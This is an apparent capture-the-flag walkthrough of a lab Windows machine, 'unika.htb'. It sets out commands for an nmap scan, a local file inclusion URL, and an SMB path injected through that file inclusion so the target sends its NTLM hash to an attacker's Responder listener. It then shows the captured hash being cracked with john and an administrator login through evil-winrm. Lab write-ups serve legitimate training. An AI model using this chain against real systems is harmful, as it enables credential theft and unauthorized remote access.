Skip to content

Responder

nmap -sV -p- --min-rate 5000 <ip_target>

curl <ip_target>

Name-Based Virtual

Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname.

echo "<ip_target>   unika.htb" | sudo tee -a /etc/hosts
# kalau error
echo "<ip_target>\tunika.htb" | sudo tee -a /etc/hosts

open website unika.htb from your browser

the website is vulnerable with LFI here

http://unika.htb/index.php?page=/../../../../../../../../windows/system32/drivers/etc/hosts

NTLM

NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain.

Detail NTLM

Resoponder

In the PHP configuration file php.ini , "allow_url_include" wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks. However, even if allow_url_include and allow_url_fopen are set to "Off", PHP will not prevent the loading of SMB URLs. In our case, we can misuse this functionality to steal the NTLM hash

hacktricks

Responder

Start

git clone https://github.com/lgandx/Responder

cd Responder
cat Responder.conf
sudo python3 Responder.py -I tun0

http://unika.htb/index.php?page=//<your_ip>/tes

echo "Administrator::RESPONDER:3f5e727d7ed35f9c:9CA7E81D002157FB82B3F14CE7436F7D:010100000000000080345533216DD80139A2D9BBCB33D0800000000002000800500041005400460001001E00570049004E002D0053004C005200500058004C003100410033004500410004003400570049004E002D0053004C005200500058004C00310041003300450041002E0050004100540046002E004C004F00430041004C000300140050004100540046002E004C004F00430041004C000500140050004100540046002E004C004F00430041004C000700080080345533216DD8010600040002000000080030003000000000000000010000000020000097613542A9646845C27322139CD448F75C265250A6C327C29EAD2ECDE1D6B8F20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310030000000000000000000" > hash.txt

$ john -w=/path/to/rockyou.txt hash.txt
badminton        (Administrator)

WinRM

We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.

sudo apt install evil-winrm
evil-winrm -i <ip_target> -u administrator -p badminton

flag is in C:\Users\mike\Desktop